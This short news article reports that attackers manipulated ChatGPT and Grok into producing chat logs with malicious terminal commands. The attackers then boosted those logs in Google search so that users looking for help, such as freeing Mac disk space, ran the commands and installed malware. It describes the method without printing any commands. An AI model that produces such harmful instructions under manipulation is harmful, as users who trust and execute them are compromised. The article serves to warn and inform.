Home / Technology / AI Search Scams: Hackers Seed Google With Malicious Commands
AI Search Scams: Hackers Seed Google With Malicious Commands
11 Dec
Summary
- Hackers use AI prompts to embed dangerous commands in Google searches.
- Victims are tricked into executing commands, leading to malware installation.
- The attack bypasses traditional security measures by exploiting user trust in AI.

Hackers are now exploiting artificial intelligence to seed Google search results with dangerous commands. This emerging threat involves using AI assistants to generate instructions that, when executed by unsuspecting users, grant attackers access to install malware. The method relies on making AI-generated chat logs with malicious commands publicly visible and boosting them in search rankings.
This sophisticated attack vector was detailed in a recent report, which found that both ChatGPT and Grok could be manipulated. A specific instance involved a Mac-targeting malware attack where a user searching for disk space cleanup advice was led to a poisoned AI chat, subsequently executing a harmful command. This bypasses conventional security warnings as users implicitly trust platforms like Google and popular AI chatbots.
As of December 2025, the full scope of this attack remains under investigation, though a specific instance has been taken down from Google search. Users are strongly advised to exercise extreme caution when executing commands from online sources, even those appearing on trusted platforms. Standard cybersecurity practices, such as verifying command functions before execution, are crucial.




